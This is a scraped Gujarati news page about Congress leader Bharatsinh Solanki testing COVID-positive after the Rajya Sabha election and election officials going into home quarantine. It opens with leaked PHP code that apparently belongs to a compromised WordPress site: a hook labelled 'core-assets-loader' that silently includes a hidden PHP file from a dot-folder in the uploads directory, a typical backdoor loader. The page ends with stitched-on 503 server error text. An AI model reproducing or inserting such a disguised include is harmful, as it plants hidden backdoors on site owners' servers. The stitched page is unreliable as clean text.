add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); ભરતસિંહનો કોરોના પોઝિટિવ આવ્યા બાદ મુખ્ય ચૂંટણી અધિકારી સહિત અનેક લોકો થયા હોમ ક્વોરેન્ટાઇન – SOCH INDIA
Menu

देश
ભરતસિંહનો કોરોના પોઝિટિવ આવ્યા બાદ મુખ્ય ચૂંટણી અધિકારી સહિત અનેક લોકો થયા હોમ ક્વોરેન્ટાઇન

nobanner

 રાજ્યસભાની ચૂંટણી (Rajyasabha Election) બાદ કોંગ્રેસ નેતા ભરતસિંહ સોલંકી (Bharatsinh Solanki)નો કોરોના વાયરસ (Corona virus)નો રિપોર્ટ પોઝિટિવ આવતા હડકંપ મચી ગયો છે. રાજ્યસભાના ચૂંટણી સમયે ભરતસિંહ અનેક લોકોના સંપર્કમાં આવ્યા હતા. કોંગ્રેસના નેતાઓ, ધારાસભ્યો સિવાય ભરતસિંગ ચૂંટણી દરમિયાન ફરજ પર રહેલા અધિકારીઓના સંપર્કમાં પણ આવ્યા હતા. હવે રાજ્યના મુખ્ય ચૂંટણી અધિકારી ડોક્ટર એસ. મુરલી ક્રિષ્ણન, સ્પેશિયલ ઓબ્ઝર્વર રાઘવ ચંદ્રા સહિત અન્ય લોકો હોમ ક્વોરેન્ટીન થયા છે.

ભરતસિંહનો કોરોના રિપોર્ટ આવ્યો પોઝિટીવ
કોંગ્રેસના નેતા ભરતસિંહ સોલંકીનો રાજ્યસભાની ચૂંટણી બાદ કોરોના વાયરસનો રિપોર્ટ પોઝિટિવ આવ્યો હતો. તેમને ખાનગી હોસ્પિટલમાં દાખલ કરવામાં આવ્યા છે. આ સમાચાર બાદ ગઈકાલે કોંગ્રેસ નેતા શક્તિસિંહ ગોહિલ દિલ્હીમાં પોતાના નિવાસ્થાને હોમ ક્વોરેન્ટીન થયા હતા. તો આજે રાજ્યના મુખ્ય ચૂંટણી અધિકારી એસ મુરલી ક્રિષ્ણન, દિલ્હીથી આવેલા સ્પેશિયલ ઓબ્ઝર્વર રાઘવ ચંદ્રા પણ દિલ્હીમાં પોતાના ઘરે ક્વોરેન્ટીન થયા છે. તો રિટર્નિંગ ઓફિસર ચેતન પંડ્યા, ભાજપના રાજ્યસભામાં વિજેતા બનેલા અભય ભારદ્વાજ પણ હોમ ક્વોરેન્ટીન થયા છે. હજુ આ યાદી લાંબી બનવાની શક્યતા છે.

રાજીવ સાતવનો રિપોર્ટ નેગેટિવ
તો ભરતસિંહ સાથે સંપર્કમાં રહ્યા બાદ ગુજરાત કોંગ્રેસના પ્રભારી રાજીવ સાતવે પણ પોતાનો કોરોના ટેસ્ટ કરાવ્યો હતો. હાલ તેમનો રિપોર્ટ નેગેટિવ આવ્યો છે. પરંતુ રાજીવ સાતવ સરકારી નિયમ અનુસાર હોમ ક્વોરેન્ટીનમાં રહેશે.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.